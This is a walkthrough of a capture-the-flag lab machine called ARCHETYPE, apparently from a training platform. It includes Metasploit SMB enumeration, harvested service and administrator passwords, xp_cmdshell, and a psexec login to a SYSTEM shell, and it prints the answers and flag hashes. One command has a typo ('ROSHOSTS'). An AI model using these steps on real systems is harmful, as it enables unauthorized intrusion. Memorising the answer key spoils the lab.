IP = 10.129.50.196
RBSH= 10.10.15.6

## Task 1 -  Which TCP port is hosting a database server? 
	1433
## Task 2 -  What is the name of the non-Administrative share available over SMB? 
	backups
```bash
msfconsole
search smb_enumshares
use 0
options
set ROSHOSTS $IP
run
```
## Task 3 -  What is the password identified in the file on the SMB share? 
	M3g4c0rp123
```
Host = 		ARCHETYPE
User ID=	sql_svc
Password=	M3g4c0rp123
```
## Task 4 -  What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? 
	mssqlclient.py
## Task 5 -  What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? 
	xp_cmdshell
## Task 6 -  What script can be used in order to search possible paths to escalate privileges on Windows hosts? 
	Winpeas
## Task 7 -  What file contains the administrator's password? 
	ConsoleHost_history.txt
```
User:		Administrator
Password:	MEGACORP_4dm1n!!
```
## Task 8 -  Submit user flag 
	3e7b102e78218e935bf3f4951fec21a3
## Task 9 -  Submit root flag 
	b91ccec3305e98240082d4474b848528
```bash
python3 psexec.py administrator@$IP
<##password##>
```
```shell
> whoami
nt authority\system

>cd C:\Users\administrator\Desktop
>dir 
>type root.txt
<##flag##>
````


